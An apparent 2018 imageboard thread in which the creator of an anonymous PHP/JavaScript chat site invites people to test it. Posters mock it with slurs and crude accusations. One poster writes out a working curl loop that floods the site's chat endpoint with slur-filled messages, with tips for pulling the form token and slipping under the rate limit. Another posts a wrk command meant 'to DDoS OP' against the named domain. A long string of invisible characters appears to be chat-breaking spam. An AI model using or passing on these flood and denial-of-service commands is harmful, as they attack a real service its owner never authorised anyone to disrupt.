Come test my anonymous chat

I made an anonymous streaming chat using php and javascript, I need to see how many simultaneous users it can handle before continuing with the rest of this project using this path.

I posted it in /wdg/ where it got a good response but there were never more than 3 people in the room at time.

Also there’s almost p2p private messaging.

Let’s be autistic together in real time on Christmas Eve anons

lausanonymous.com

Attached: 87E5A411-929B-493F-8BD9-0736E545A9EB.png (1536x1841, 1.62M)

Other urls found in this thread:

lausanonymous.com/Discuss/chat'
lausanonymous.com'
lausanonymous.com/Discuss/'
lausanonymous.com/
twitter.com/NSFWRedditGif

>flags
>anonymous

p2p? Using webrtc i presume? If so, what are you using for stun and turn server? If not, how do you realize p2p?

nice botnet user

hey this is pretty good, bergjude

wtf the chat just repeats itself... it's all a fuckin script

I'm using server sent events, pms get relayed but not stored from the server to the other user only passing through the ram

You're a script

Op is using it to proxy your connection to access CP sites bail out

Is this even possible technically?

Yes.

Too much spam, you need more spam detection and rate limiting.
Also, source code?

Gonna need the ability to mute other users if there's no mods on this bitch

When are you going to add the ability to share files?

that would wreck the site and endager the OP.

nice honeypot XD LMAO
anyway please this daily thread
also you need a mechanic to stop spammers seriously

And it's down.
So which one of you suggested flood the server with wrk?

ٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴٴL

Ok, this chat is kinda shit.
You can easily flood spam it with a curl oneliner:
while true; do curl 'lausanonymous.com/Discuss/chat' -H 'Origin: lausanonymous.com' -H 'Accept-Encoding: gzip, deflate, br' -H 'Accept-Language: en-US,en;q=0.9,pl;q=0.8' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/71.0.3578.80 Chrome/71.0.3578.80 Safari/537.36' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'Accept: */*' -H 'Referer: lausanonymous.com/Discuss/' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' -H 'DNT: 1' --data 'message=shit+cunt+nigga&token=&submit=Submit' --compressed; sleep 2; done

There is no autoban, only autoblock limiting post frequency to more than 1 per second (2 won't be caught).
Token can be easily found by inspecting DOM tree from dev tools, looking for hidden input "token" and taking its value.
Have fun.

Nypa

Fucking burger glow in the dark, stop spamming the chat

wrk -t8 -c 500 -d 600 lausanonymous.com/

to DDoS OP

I'm not a burger, that nigger can't even copypaste my command properly

>he's ddosing clients in the chat
k ek k dead

Lol at the little spamming bitch in the thread, children this is a sign of having a small penis

Why are you so salty, OP?

Attached: screenshot-lausanonymous.com-2018.12.24-14-56-19.png (1919x169, 37K)

>I need to see how many simultaneous users it can handle before continuing with the rest of this project using this path.
You should easily be able to handle 5000 users even with poor server software. A random thread on Jow Forums won't get you anywhere near that amount of traffic. Just spam it yourself to stress test.

confirmed

Attached: file.png (473x206, 103K)

I'm in the cap :^)

so its not p2p, ok

That was a wild ride, thanks for finding the flood holes and other security issues mysterious user. Sorry about being a bit salty but you caught me by surprise and I thought I had all my bases covered.

It’s fun talking to fellow Jow Forums bros

Sure thing mate

Attached: edproved.jpg (475x263, 16K)

>This is an anonymous chat where your race, gender, age and other prejudices are irrelevant. Here your ideas must stand on their own.

>benis benis benis benis benis benis benis benis benis benis

Italia made me justify the text left, vote if it should stay this way or return to centered

bumping based chat, being used as a proxy for streaming CP ftw!

>instantly +4k ublock notifications
wew

I want it on the right.

Surpringly very little Americans in here, I didn’t think Jow Forums was so European

Dude everyone users European vpn to avoid being called burgers

What a bunch of fags. They can't handle the banter if they don't wear the stars and stripes with pride.

>letting some rando faget OP on Jow Forums see your real IP

Mods and janitors can see your IP

Attached: 7proxies[1].png (514x339, 302K)

not from some short-lived shitbox they haven't scraped from vpngate yet in the middle of saudi arabia they can't.. uwu

Attached: 1536147036903.jpg (800x435, 49K)

The chat was just shitposting. Nothing there in the chat was anything that would ruin you if you didn't post real info and nothing illegal was posted.

i meant OP specifically
whom i assume is the site owner

>This is an anonymous chat where your race, gender, age and other prejudices are irrelevant. Here your ideas must stand on their own.
>everyone assumes your identity as whote mael anyway
Not an ideal world.

Wtf would i do with a bunch of random ips anyway?

Sell them to chinks or something.
Guess Jow Forums doesn't understand that a database of IPs is pretty useless on its own, you always need to crossreference it with some other data (visited website, sent CP, downloaded loli animoos etc.).

bumping for chat lulz

I concur, it's a fun trainwreck worth salvaging

dead chat.

alive
get in here if you want to get h4x0red by ebin h4x0rs

bump, get in here faggots

leaving bump

>sighsigh1sigh5

This looks fun
It's like Jow Forums but in real time

Now divide it into boards so people can shitpost about different topics